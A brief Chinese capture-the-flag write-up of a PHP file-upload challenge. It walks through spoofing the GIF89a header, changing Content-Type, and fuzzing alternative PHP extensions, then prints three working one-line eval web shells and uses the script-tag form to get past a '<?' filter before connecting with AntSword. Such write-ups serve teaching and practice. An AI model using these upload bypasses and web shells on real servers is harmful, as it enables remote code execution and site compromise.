本题目的是熟知一些简单php一句话木马以及一些绕过方式
一眼便是文件上传漏洞
尝试传入一句话木马
GIF89a是文件头信息,可以通过识别文件头信息判断是什么文件
通过将文件头改为GIF89a让系统以为是图片文件(文件头欺骗)
返回not image
现在就需要考虑是否是看了http头文件里的Content-Type:了
content-type:是网页中用于定义网络文件的类型和编码的标头,可以指定浏览器以什么形式、什么编码读取文件
通过修改content-type:为image/jpeg告诉网站是通过图片形式读取文件从而绕过
还是返回not php,看来还是对后缀做了防护
PHTML、PHP3、PHP4、PHP5、PHP7、PHPS
尝试用其他后缀进行绕过,以上文件后缀会被当做php文件执行
用bp抓包fuzz一下
看起来php7和phps可以成功上传,对后缀过滤的不是很严格
回响页面反应文件中<?被发现了
一般的一句话木马有三种形式
<?php eval($_POST['a']);?>
<?= eval($_POST['a']);?> 在现在的php中<?=等同于<?php echo
<script language="php">eval($_POST['a']);</script>
应为这里封了<?,所以我们使用第三种Php一句话木马
成功上传
先在用蚁剑连接就可以了
或者通过POST传参也行